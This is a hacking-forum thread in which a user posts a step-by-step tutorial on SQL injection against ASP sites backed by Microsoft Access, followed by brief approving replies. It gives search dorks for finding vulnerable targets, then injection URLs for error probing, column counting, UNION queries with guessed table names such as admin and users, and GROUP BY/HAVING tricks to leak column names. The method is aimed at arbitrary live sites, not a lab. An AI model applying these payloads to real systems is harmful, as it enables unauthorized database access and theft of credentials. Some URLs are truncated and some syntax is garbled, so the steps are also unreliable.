» [Article] [+] Asp Vulnerability

[ne011]

A Basic Tutorial on injection(ASP)


Step 1:
------

Good dork: site:.org inurl:.asp?id=
site:.com inrul:.aspx?=
site:.co.uk inurl:.asp?cid=
Or you can figure out your own dork.

Step 2:
-------

Lets say we found this

Code: http://www.site.com

we will crawl around it until we get to this

Code: http://www.site.com/en/pressread.asp?id=563

We should see normal page is on. i will to put single quote and see what we could come up with, the resultant URL is

Code: http://www.site.com/en/pressread.asp?id=563'

Now you should see and error like this,

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=563' ;'.
/en/includes/configdb.asp, line 23

the error msg on the second like says that we have great chance to inject here, so we proceed with the 1+and+1 test,

Code: http://=http://www.site.com/en/press...d=563+AND+1=1#


NOTE:
----
In asp we will use the # for commenting the rest of the query instead of -- or /* .
If you got an error says type mismatch like int or string something, we can figure out that the input is being checked
for data type. if you insist then we should find a site that accepts both int and char in the input.

Now we are going to use AND+1=0#

Code: http://www.site.com/en/pressread.asp?id=563+AND+1=0#

if you got incomplete page on or such and error on,

ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 44

Now we need to find the column number, for that we will use ORDER BY command

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '10' as a valid field name or

expression.
/en/includes/configdb.asp, line 23

that error like our MySQL error unknown Column '10'. we will keep on decreasing untill we are on the correct number.
for out example that should be ... 9

Code: http://www.site.com/en/pressread.asp...3,4,5,6,7,8,9#

at this point you should see another error,

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 23

the query will not execute. because the query needs an existing table to successfully execute, we will keep guessing
until we get existing table, otherwise we will get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'admin'.

Make sure it
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23

that error means the table used does not exist, possible tables that works most of the time are;

user
username
users
admin
administrator
login
news
sysobjects
customers
.............

Our example will be OK with table admin and ....
Code:
http://www.site.com/en/pressread.asp...,7+from+admin#

We should still see the error and ignore it and look up besides the 'PRESS RELEASES >' you should see number 4
at this point i think any smart guys can find out about columns names ...etc.

Step 3:
------
We can find the columns names by using HAVING BY, for example
HAVING 1=1 --
GROUP BY table.columnfromerror1 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and on and on ...

THATS ALL ..

Best Regards to my friends Malvo, Eddy and zero

----------------------------------------------------

[MaXe]

So, where's the how to root the server via MS-SQL afterwards? :D jk

Nice thread, i liked it even though it is almost the same as MySQL, but not 100% ;) +Repz

[TheXero]

wow dude nice tutorial xD +rep

[ne011]

Thanx Max n Xero for the suggestions .... but i need to try some more of it ....

[N4ck0]

thx for share